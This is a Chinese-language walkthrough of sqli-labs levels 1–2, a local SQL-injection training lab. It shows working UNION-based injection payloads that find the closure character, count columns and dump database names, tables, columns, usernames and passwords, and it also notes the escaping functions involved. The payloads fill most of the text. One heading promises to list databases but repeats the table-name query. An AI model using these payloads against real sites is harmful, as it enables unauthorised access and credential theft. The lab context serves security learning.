SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)

Less-1

先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码:

http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 --

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第1张图片
测试闭合符号,常见的闭合符号有'"')"),这一题用到的闭合符号恰巧都能使用

判断列数oeder by (by 3测试字段数为3)

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第2张图片直到值为4的时候反馈库中没有第四列数据:
在这里插入图片描述
union联合查询
测试联合查询库中有的前三列,格式如下,做间隔符:

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+

没有报错证明命令格式无误,但依旧反馈两个大大的绿色 Dumb ,依旧不是我们想要的,问题在于union前面的id,ID值为1的1、2、3列表内没有数据不代表别的ID值内没有,尝试更换ID值继续测试:

http://127.0.0.1/sqli-labs/Less-1/?id= X ’ and 1=2 union select 1,2,3 --+

将以上命令中的红色X(ID值)替换得到的不同反馈如下:
ID=0时(无信息)↓---------------------------ID=2时(有趣)↓SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第3张图片
SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第4张图片
前面的步骤自从判断闭合符之后就是一下这个样子

Your Login name:Dumb
Your Password:Dumb

差点让我放弃,我以为我的靶场坏了呢,突然反馈这么多有趣的信息,立刻精神倍儿棒。继续!

?id=0' union select 1,version(),database() --+

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第5张图片
此处宽字节注入涉及到的函数:
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串;
database()查询数据库;
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符;
mysql_escape_string() — 转义一个字符串;
version()Version确认(版本确认);


查看所有数据库名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述
查询security内的所有表名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述


爆数据表——使用下面的语句爆破出列名:

?id=1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

在这里插入图片描述
爆用户名和密码——使用下面的语句爆破出用户名及密码:

?id=1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

在这里插入图片描述


Less-2

第一步先判断闭合符,键入?id=1并逐个判断闭合符号
报错:

You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘’ LIMIT 0,1’ at line 1

不仅是'爆出这样的错误,常见的闭合符'"')")都报出同样的错误。
通过键入

?id=1 and 1=1 --+

反馈亲切的:
Your Login name:Dumb
Your Password:Dumb

推断出闭合符为整形
SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第6张图片同第一题判断数列order by,同第一题一样列数为三列:

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第7张图片查看回显地点

?id=-1 union select 1,2,3+

利用联合查询来查找想要的数据:

?id=-1 union select 1,database(),version()--+

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第8张图片
查看后台数据库的语句,可见与预期相符:
SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第9张图片
爆用户名和密码,与第一题几乎一样,区别在于闭合符号,第二题考察到的是整形闭合符号,第一题的是'

?id=-1 AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)_第10张图片


未完待续

你可能感兴趣的:(SQL注入,数据库,mysql,sql)